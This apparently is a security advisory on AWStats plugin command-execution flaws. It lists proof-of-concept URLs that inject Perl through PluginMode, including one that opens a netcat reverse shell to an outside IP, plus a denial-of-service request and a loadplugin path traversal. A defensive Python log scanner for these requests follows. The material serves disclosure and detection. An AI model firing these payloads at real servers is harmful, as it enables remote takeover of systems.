AWStats Plugin Multiple Remote Command Execution Vulnerabilities

The following proofs of concept have been provided:

To execute arbitrary commands:
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+system('id')+;
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;

To trigger a denial of service condition:
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep

To load the 'blib' Perl module:
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib

The following proof of concept was provided by <newbug@chroot.org>:
http://www.example.com/awstats/awstats.pl?pluginmode=:system http://xxx/awstats/awstats.pl?pluginmode=:system (?/bin/ls?);
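As an added example (not part of the original advisory), a defender-side check that flags the two request shapes shown above, a `PluginMode`/`pluginmode` value beginning with `:` and a `loadplugin` value containing a traversal path, in Apache-style access log lines. The log lines are constructed samples and the function names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not taken from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2010:10:00:00 +0000] "GET /cgi-bin/awstats-6.4/awstats.pl?config=site&month=01 HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2010:10:00:01 +0000] "GET /cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+system('id')+; HTTP/1.1" 200 120
10.0.0.8 - - [01/Jan/2010:10:00:02 +0000] "GET /awstats/awstats.pl?pluginmode=%3Asystem HTTP/1.0" 500 0
10.0.0.9 - - [01/Jan/2010:10:00:03 +0000] "GET /cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib HTTP/1.1" 200 300
"""

# Request target (path + query) inside the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def classify_request(target):
    """Return finding labels for one request target; empty list if nothing matches."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("awstats.pl"):
        return []
    findings = []
    # parse_qsl decodes %XX and '+', so '%3Asystem' and ':print+system(...)' are
    # compared in their decoded form; keep_blank_values keeps '?&pluginmode=' parsing.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        k = key.lower()  # the advisory shows both PluginMode and pluginmode
        # Every PoC above smuggles Perl through a leading ':' in the plugin mode value.
        if k == "pluginmode" and value.startswith(":"):
            findings.append("pluginmode_code_injection")
        # loadplugin should name a plugin, never a traversal path to an arbitrary module.
        if k == "loadplugin" and ("../" in value or value.startswith("/")):
            findings.append("loadplugin_path_traversal")
    return findings


def scan_access_log(text):
    """Return (client_ip, target, findings) for each suspicious line in the log text."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = classify_request(m.group(1))
        if findings:
            hits.append((line.split(" ", 1)[0], m.group(1), findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan_access_log(SAMPLE_LOG):
        print(ip, ",".join(findings), target)
```

The same `classify_request` check can sit in front of the CGI as a request filter; rejecting a `PluginMode` value that is not a plain plugin name removes the whole class rather than individual payloads.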

The following proof of concept has been made available:



Copyright 2010, SecurityFocus